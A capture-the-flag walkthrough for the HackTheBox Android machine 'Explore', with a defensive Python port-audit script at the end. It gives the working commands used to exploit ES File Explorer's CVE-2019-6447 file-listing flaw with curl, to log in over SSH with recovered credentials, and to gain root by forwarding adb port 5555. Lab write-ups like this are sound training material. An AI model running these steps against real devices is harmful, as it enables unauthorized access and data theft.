
HackTheBox Walkthrough - Explore


🛡️Types of OS : Android

🌞Released on : 26th June 2021

☢️Difficulty : Easy

👍Point: 20

nmap -vv --reason -Pn -A --osscan-guess --version-all -p- $IP -oN Explore.nmap

nmap_scan.report

💉Running the nmap scan gives four ports

port 2222 — ssh

port 59777 — http

port 5555 — adb shell {this can be found by searching on Google}

adb_shell_port

ffuf -u http://explore.htb:59777/FUZZ -w /usr/share/wordlists/dirb/big.txt -t 200 -c

ffuf_scan

😃Let's visit the web page.

😜As you can see, it shows Forbidden. So let's try some other directory.

😃And we get the same result. Let's find out which service uses port 59777 on Android.

☺️We find this article from The Daily Swig, which explains the vulnerability in ES File Explorer that exposes user data on an open port, where anyone can read it.

😏Let's try running FFUF on http://explore.htb:59777/sdcard/

ffuf_sdcard

😏Looks like we found our first flag. So easy.

😁The PoC for the above vulnerability can be found on this link

👍Going through the PoC, I found that we can execute commands.

😌Looking at the picture above, we can find some basic commands, so let's try them.

curl --header "Content-Type: application/json" --request POST --data '{"command":"listFiles"}' http://explore.htb:59777/sdcard/DCIM

image

🤔Let's check creds.jpg

ssh_creds

😊Here we found creds for SSH. Now let's SSH into the box.

ssh kristi@explore.htb -p 2222

Password authentication

Password:

:/ $ id

uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768

😃I checked whether the user has execution rights, but it does not. So basically we cannot install anything to get root. But we have port 5555 open, which is running adb shell. I tried to access it from my Kali machine but I couldn't.

open_ports

😶As we can see, 5555 is listening, so let's forward that port through SSH and connect to it from our own box.

ssh -L 5555:127.0.0.1:5555 kristi@explore.htb -p 2222

adb connect localhost:5555

connected to localhost:5555

adb shell

error: more than one device/emulator

😊Run adb shell to get a shell. If it shows an error like the one above, list the devices with adb devices

🥳As you can see, there are two devices connected. Therefore let's connect to a specific device with the command adb -s localhost:5555 shell. Instructions for this command can be found here

💖And we get root on connecting through adb shell.

🥳The root flag can be found in the data directory.

............Rooted...........

💖Summary of knowledge

💉ES File Explorer Security Vulnerability CVE-2019-6447

🛡️SSH port forwarding to get root
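
From the defender's side, both findings in this summary come down to listeners that should not be there. The script below is an added example, not part of the original walkthrough: it audits a device's /proc/net/tcp for the two ports seen on this box and reports loopback-only listeners as well, because an SSH local forward reaches those too. The sample table, its bind addresses and its uids are constructed, and the function names are hypothetical.

```python
import socket
import struct

# Ports this walkthrough shows to be dangerous when left listening (from the page).
RISKY_PORTS = {
    5555: "adb over TCP (shell access to the device)",
    59777: "ES File Explorer HTTP service (CVE-2019-6447)",
}
TCP_LISTEN = "0A"  # socket state code for LISTEN in /proc/net/tcp

# Constructed sample in /proc/net/tcp layout; addresses and uids are made up.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:E981 00000000:0000 0A 00000000:00000000 00:00000000 00000000 10050        0 20001
   1: 0100007F:15B3 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 20002
   2: 00000000:08AE 00000000:0000 0A 00000000:00000000 00:00000000 00000000 10076        0 20003
   3: 0A0A0A0A:08AE 0E0A0A0A:C350 01 00000000:00000000 00:00000000 00000000 10076        0 20004
"""

def decode_endpoint(field):
    """Turn '0100007F:15B3' (little-endian hex IPv4, hex port) into ('127.0.0.1', 5555)."""
    hex_ip, hex_port = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(hex_ip, 16)))
    return ip, int(hex_port, 16)

def listening_sockets(text):
    """Yield (ip, port, uid) for every socket in LISTEN state."""
    for line in text.splitlines()[1:]:  # skip the header row
        cols = line.split()
        if len(cols) < 8 or cols[3] != TCP_LISTEN:
            continue
        ip, port = decode_endpoint(cols[1])
        yield ip, port, int(cols[7])

def audit(text):
    """Return findings for risky listeners, including loopback-only ones."""
    findings = []
    for ip, port, uid in listening_sockets(text):
        if port not in RISKY_PORTS:
            continue
        loopback = ip.startswith("127.")
        reach = "local shell or SSH -L forward" if loopback else "network"
        findings.append({"port": port, "bind": ip, "uid": uid,
                         "reachable_via": reach, "why": RISKY_PORTS[port]})
    return sorted(findings, key=lambda f: f["port"])

if __name__ == "__main__":
    for finding in audit(SAMPLE_PROC_NET_TCP):
        print(finding)
```

On a real device, pass the contents of /proc/net/tcp to audit() instead of the sample; IPv6 listeners live in /proc/net/tcp6 and are not covered here.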
